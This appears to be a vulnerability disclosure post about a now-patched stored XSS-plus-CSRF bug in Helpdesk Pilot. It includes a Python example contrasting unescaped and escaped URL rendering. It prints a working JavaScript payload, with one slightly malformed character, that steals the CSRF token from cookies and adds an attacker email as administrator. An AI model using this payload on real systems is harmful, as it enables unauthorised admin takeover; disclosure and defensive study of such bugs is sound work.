maKthePla.net


Helpdesk Pilot Xss/CSRF Add an Admin

This bug allows a malicious party to add themselves as a Helpdesk Pilot administrator via a crafted XSS/CSRF combination. It affects all versions of the Helpdesk Pilot software. I have received confirmation from the developers that this bug has been patched in the latest version of the software. There is a video demonstration of this attack below.

The attacker submits a ticket containing a malicious URL which results in JavaScript execution. If an administrator views this ticket, the injected script performs a cross-site request forgery that adds the attacker as an admin. The attack can also be crafted for the case where a regular Staff account opens the ticket.

The bug is a result of incorrect escaping of a URL when the ticket is displayed. For a simple proof of concept you can use the following: http://makthepla.net/<script>alert(1);</script> This demonstrates that JavaScript execution is possible by submitting a ticket.
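The root cause above is output escaping, so here is an added illustration (my own example, not Helpdesk Pilot code) of the vulnerable rendering pattern beside a hardened version: the ticket URL is HTML-escaped before insertion and only http/https links are turned into anchors. The function names and the sample ticket value are constructed for the example.

```python
import html
from urllib.parse import urlsplit

# Constructed sample ticket field, modelled on the simple proof of concept above.
SAMPLE_URL = 'http://makthepla.net/<script>alert(1);</script>'


def render_url_unsafe(url: str) -> str:
    """Vulnerable pattern: the submitted URL is interpolated into the ticket
    view verbatim, so any markup inside it is parsed by the viewer's browser."""
    return '<a href="' + url + '">' + url + '</a>'


def render_url_safe(url: str) -> str:
    """Hardened pattern: escape every character that is special in HTML
    (including quotes, so the attribute cannot be broken out of) and only
    render http/https values as clickable links."""
    escaped = html.escape(url, quote=True)
    scheme = urlsplit(url).scheme.lower()
    if scheme not in ("http", "https"):
        # javascript:, data: and malformed values are shown as plain text only.
        return escaped
    return '<a href="' + escaped + '" rel="noopener noreferrer">' + escaped + '</a>'


def contains_raw_markup(rendered: str) -> bool:
    """Reviewer check: does the rendered fragment still contain an
    unescaped <script tag?"""
    return "<script" in rendered.lower()


if __name__ == "__main__":
    print("unsafe :", render_url_unsafe(SAMPLE_URL))
    print("safe   :", render_url_safe(SAMPLE_URL))
    print("unsafe leaks markup:", contains_raw_markup(render_url_unsafe(SAMPLE_URL)))
    print("safe leaks markup  :", contains_raw_markup(render_url_safe(SAMPLE_URL)))
```

Note that the page's payload reads the CSRF token straight out of document.cookie, so the CSRF protection offers no defence once script runs on the origin; correct output escaping is the fix that matters.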

For a more malicious demonstration, as shown in the video, an admin could be added using the following URL:

http://makthepla.net/Add_admin_poc/<script>$(document).ready(function(){$.ajax({type: /"POST",url:"http://poc.helpdeskpilot.net/staff/manage/staff/",data:"csrfmiddlewaretoken="+document.cookie.split('=')[1]+"&formtype=invite_staff&staff&first_name&last_name&email=ATTACKER@MAIL.COM&bulk_emails&role=1&categories=1",success:function(data){alert("Admin-Added-POC");},error:function(data){alert("POC_FAILED");}})});</script>

This submits the staff-invite form, which adds an administrator provided the person viewing the ticket has administrator permissions.